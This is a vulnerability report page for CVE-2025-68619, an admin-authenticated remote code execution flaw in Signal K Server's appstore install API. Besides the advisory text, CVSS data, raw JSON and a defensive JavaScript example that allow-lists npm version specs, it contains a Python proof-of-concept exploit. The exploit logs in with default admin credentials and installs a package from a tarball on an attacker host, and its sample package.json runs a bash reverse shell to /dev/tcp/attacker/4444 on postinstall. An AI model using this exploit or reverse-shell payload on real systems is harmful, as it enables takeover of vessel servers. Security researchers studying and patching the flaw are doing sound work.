Security Vulnerability Report
CVE-2025-68619 CVSS 7.2 HIGH

Published: 2026-01-01 19:15:54
Last Modified: 2026-01-06 17:57:24

Description

Signal K Server is a server application that runs on a central hub in a boat. Versions prior to 2.19.0 of the appstore interface allow administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution. The vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script. Version 2.19.0 contains a patch for the issue.
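The root cause described above is that the `version` field is treated as a full npm package spec rather than a plain version. The following JavaScript is an added defensive example, not Signal K Server's own code or its actual 2.19.0 fix: it shows the unchecked pattern beside an allow-list check that accepts only exact semver versions (optionally `v`-prefixed) or the `latest` dist-tag, so tarball URLs, git specs, GitHub shorthand, `file:` paths and ranges never reach `npm install`. The regexes, the `ALLOWED_TAGS` set and the sample request bodies are assumptions made for this example.

```javascript
// Added example (not Signal K Server's own code): allow-listing the npm
// version specifier before it is handed to `npm install`.
//
// npm reads "version" as a full package spec: a semver range, a dist-tag,
// a git URL, GitHub shorthand (user/repo), a file: path or an http(s)
// tarball URL. Any of the non-registry forms can ship a postinstall script,
// so the server should accept plain registry versions only.

// semver.org grammar, plus the optional leading "v" that npm tolerates.
const SEMVER_RE =
  /^v?(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$/;

// Dist-tags the appstore is willing to resolve (assumption: only "latest").
const ALLOWED_TAGS = new Set(['latest']);

// npm package name: optional @scope/, lowercase, URL-safe characters only.
const PACKAGE_NAME_RE = /^(@[a-z0-9-][a-z0-9-._]*\/)?[a-z0-9-][a-z0-9-._]*$/;

// True only for an exact semver version or an allowed dist-tag.
// URLs, git specs, GitHub shorthand, file: paths and ranges return false.
function isSafeVersionSpec(spec) {
  if (typeof spec !== 'string' || spec.length === 0 || spec.length > 256) {
    return false;
  }
  return SEMVER_RE.test(spec) || ALLOWED_TAGS.has(spec);
}

function isValidPackageName(name) {
  return typeof name === 'string' && name.length <= 214 && PACKAGE_NAME_RE.test(name);
}

// Vulnerable pattern: the request body is interpolated straight into the
// spec given to npm, so "version" may be anything npm understands.
function buildInstallSpecUnchecked(name, version) {
  return `${name}@${version}`;
}

// Hardened pattern: refuse anything that is not a plain registry version,
// so npm can only fetch `name` from the configured registry.
function buildInstallSpecChecked(name, version) {
  if (!isValidPackageName(name)) {
    throw new Error(`rejected package name: ${JSON.stringify(name)}`);
  }
  if (!isSafeVersionSpec(version)) {
    throw new Error(`rejected version specifier: ${JSON.stringify(version)}`);
  }
  return `${name}@${version}`;
}

// Constructed request bodies for illustration, not captured traffic.
const SAMPLE_REQUESTS = [
  { name: '@signalk/plugin-custom', version: '1.4.2' },
  { name: '@signalk/plugin-custom', version: 'latest' },
  { name: '@signalk/plugin-custom', version: '2.19.0-beta1' },
  { name: '@signalk/plugin-custom', version: 'https://example.invalid/pkg.tgz' },
  { name: '@signalk/plugin-custom', version: 'someuser/somerepo' },
  { name: '@signalk/plugin-custom', version: 'git+https://example.invalid/repo.git' },
  { name: '@signalk/plugin-custom', version: 'file:../somewhere' },
  { name: '@signalk/plugin-custom', version: '^1.0.0' },
];

// Runs the allow-list over a batch of request bodies and reports each verdict.
function classifyRequests(requests) {
  return requests.map(({ name, version }) => ({
    version,
    accepted: isValidPackageName(name) && isSafeVersionSpec(version),
  }));
}

for (const r of classifyRequests(SAMPLE_REQUESTS)) {
  console.log(`${r.accepted ? 'ACCEPT' : 'REJECT'} ${r.version}`);
}
```

The check is deliberately an allow-list rather than a deny-list of URL prefixes: npm's spec grammar keeps growing (aliases such as `npm:`, `github:` shorthand, bare `user/repo`), and a deny-list would have to track every form. Rejecting ranges as well keeps the installed version auditable.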

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:signalk:signal_k_server:2.19.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:signalk:signal_k_server:2.19.0:beta2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:signalk:signal_k_server:2.19.0:beta3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:signalk:signal_k_server:2.19.0:beta4:*:*:*:*:*:* - VULNERABLE
Signal K Server < 2.19.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-68619 PoC - Signal K Server RCE via malicious npm package
# Target: Signal K Server < 2.19.0

TARGET_URL = "http://target:3000"
USERNAME = "admin"
PASSWORD = "admin"
ATTACKER_SERVER = "http://attacker-server:8080"


def get_auth_token():
    """Authenticate and get session token"""
    login_url = f"{TARGET_URL}/signalk/v1/auth/login"
    data = {"username": USERNAME, "password": PASSWORD}
    response = requests.post(login_url, json=data)
    return response.json().get('token')


def exploit_rce(token):
    """Install malicious npm package via appstore API"""
    # Malicious package.json with reverse shell postinstall script
    # The attacker hosts this as a tarball on their server
    malicious_tarball = f"{ATTACKER_SERVER}/malicious-pkg.tgz"

    install_url = f"{TARGET_URL}/signalk/v1/appstore/install"
    headers = {"Authorization": f"Bearer {token}"}

    # Version parameter accepts arbitrary npm specifiers including URLs
    payload = {
        "name": "@signalk/plugin-custom",
        "version": malicious_tarball  # Can be URL, git repo, etc.
    }

    response = requests.post(install_url, json=payload, headers=headers)
    return response.status_code == 200


# Example malicious package.json content:
MALICIOUS_PACKAGE_JSON = """
{
  "name": "malicious-pkg",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "bash -i >& /dev/tcp/attacker/4444 0>&1"
  }
}
"""

if __name__ == "__main__":
    token = get_auth_token()
    if token:
        print("[+] Authentication successful")
        if exploit_rce(token):
            print("[+] Malicious package installed, check listener for shell")
        else:
            print("[-] Exploitation failed")
```

References

https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 (Release Notes)
https://github.com/SignalK/signalk-server/security/advisories/GHSA-93jc-vqqc-vvvh (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-68619", "sourceIdentifier": "[email protected]", "published": "2026-01-01T19:15:53.777", "lastModified": "2026-01-06T17:57:24.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Signal K Server is a server application that runs on a central hub in a boat. Versions prior to 2.19.0 of the appstore interface allow administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution. The vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script. Version 2.19.0 contains a patch for the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19.0", "matchCriteriaId": "102A9593-CCDC-4532-8201-E67EEFC665E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "67C0C9C4-176E-457B-97BF-56EED79F4D42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "0F33D560-D916-45D7-AAF6-63E89BE06805"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "2B544F41-AFE7-454F-BE01-89AC7B954AF5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:2.19.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "BCF3D7E0-66FE-47F1-97BA-ABCF769B0D7C"}]}]}], "references": [{"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-93jc-vqqc-vvvh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```